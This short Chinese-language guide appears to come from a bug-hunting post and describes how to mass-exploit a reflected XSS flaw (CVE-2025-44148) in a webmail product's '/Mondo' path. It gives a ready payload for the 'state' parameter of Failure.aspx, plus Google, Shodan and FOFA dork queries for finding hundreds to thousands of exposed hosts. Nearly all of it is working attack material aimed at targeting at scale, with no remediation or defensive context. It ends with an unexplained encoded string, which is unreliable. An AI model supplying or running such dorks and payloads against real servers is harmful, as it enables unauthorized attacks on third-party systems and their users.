XSS大规模狩猎:利用CVE-2025-44148漏洞的实战指南
1️⃣ Google Dorking
inurl:/Mondo/lang/sys
然后简单地在下方端点后追加将XSS负载设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”:
/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22
2️⃣ Shodan Dorking (200+ 条结果)
http.html:"/MEWebMail/Mondo"
#目标筛选
http.html:"/MEWebMail/Mondo" hostname:target.com
http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com
2个重要的方面分析: 域名 & ssl.cert.subject.cn
3️⃣ FOFA Dorking (2000+ 条结果)
body="/MEWebMail/Mondo"
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=